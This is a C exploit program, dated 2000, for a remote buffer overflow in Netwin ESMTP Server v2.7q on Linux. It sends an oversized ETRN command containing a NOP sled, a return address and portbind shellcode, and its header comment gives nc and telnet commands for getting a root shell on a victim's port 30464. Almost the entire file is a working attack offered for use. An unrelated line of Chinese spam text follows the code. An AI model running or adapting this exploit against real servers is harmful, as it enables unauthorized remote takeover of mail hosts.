/* * Netwin ESMTP Server v2.7q linux x86 remote exploit * funkySh 05/06/2000 (Taeho Oh portbind shell) * hello to b0f, #hax * * [ AAA ][ RET ][ NOP ][ SHELL ] * $ (./dmx [offset] ; cat ) | nc victim 25 * $ telnet victim 30464 * * (tested on RH6.1) */ #include char code[]= "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0" "\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06" "\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89" "\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31" "\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80" "\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04" "\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd" "\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80" "\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f" "\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89" "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31" "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff"; #define BUFFER 1100 #define A_BUFF 250 #define RET_ADDR 0xbfffca74 #define ALIGN 0 char buf[BUFFER]; int main(int argc, char * argv[]) { int i, offset = 0; long address; if(argc > 1) offset = atoi(argv[1]); address = RET_ADDR + offset; memset(buf,0x90,BUFFER); memset(buf,0x41,A_BUFF); for(i=240+ALIGN;i<350;i+=4) *(int *)&buf[i]=address; memcpy(buf+880,code,strlen(code)); fprintf(stderr,"Using: 0x%x\n", address); printf("HELO dupa\n",0); printf("ETRN %s\n", buf); fprintf(stderr,"Now try to telnet victim:30464\n"); }

亚洲欧美在线